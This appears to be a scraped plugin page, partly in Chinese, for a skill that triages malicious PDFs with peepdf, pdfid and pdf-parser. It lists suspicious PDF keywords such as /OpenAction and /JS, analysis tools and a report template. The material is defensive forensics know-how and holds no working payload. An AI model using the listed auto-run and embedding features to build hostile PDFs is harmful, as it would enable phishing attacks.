Performs static analysis on malicious PDFs using peepdf, pdfid, and pdf-parser to extract embedded JavaScript, shellcode, and suspicious objects. Useful for malware reverse engineering and DFIR.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
- 对来自钓鱼邮件的可疑 PDF 附件进行分类
Analyzes malicious PDFs using peepdf, pdfid, and pdf-parser to extract JavaScript, shellcode, suspicious objects, and IOCs for malware triage and forensics.
Performs static analysis of malicious PDF documents using peepdf, pdfid, and pdf-parser to extract embedded JavaScript, shellcode, and suspicious objects. Useful for triaging phishing attachments and malware forensics.
Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to detect embedded JavaScript, shellcode, exploits, and suspicious objects without opening. Extracts payloads for further analysis in malware investigations.
Share bugs, ideas, or general feedback.
| 概念 | 定义 |
|---|---|
| /OpenAction | PDF 打开时自动执行的操作 |
| /JavaScript /JS | PDF 对象中嵌入的 JavaScript 代码 |
| /Launch | 启动外部应用程序的操作 |
| /EmbeddedFile | 嵌入在 PDF 结构中的文件 |
| FlateDecode | 用于隐藏内容的 zlib 压缩过滤器 |
| Object Streams | 存储在压缩流中的 PDF 对象 |
| 工具 | 用途 |
|---|---|
| peepdf / peepdf-3 | 带 JavaScript 模拟的交互式 PDF 分析 |
| pdfid.py | 扫描可疑关键词的快速分类工具 |
| pdf-parser.py | 深层对象级 PDF 解析 |
| VirusTotal | 哈希查询和 AV 检测交叉验证 |
| CyberChef | 解码和转换提取的载荷 |
分析报告:PDF-MAL-[日期]-[序号]
文件:[filename.pdf]
SHA-256:[哈希值]
可疑关键词:[/JS、/OpenAction 等]
包含 JavaScript 的对象:[对象 ID]
提取的 URL:[列表]
检测到 Shellcode:[是/否]
嵌入文件:[数量和类型]
VirusTotal 检测:[X/Y 引擎]
风险等级:[严重/高/中/低]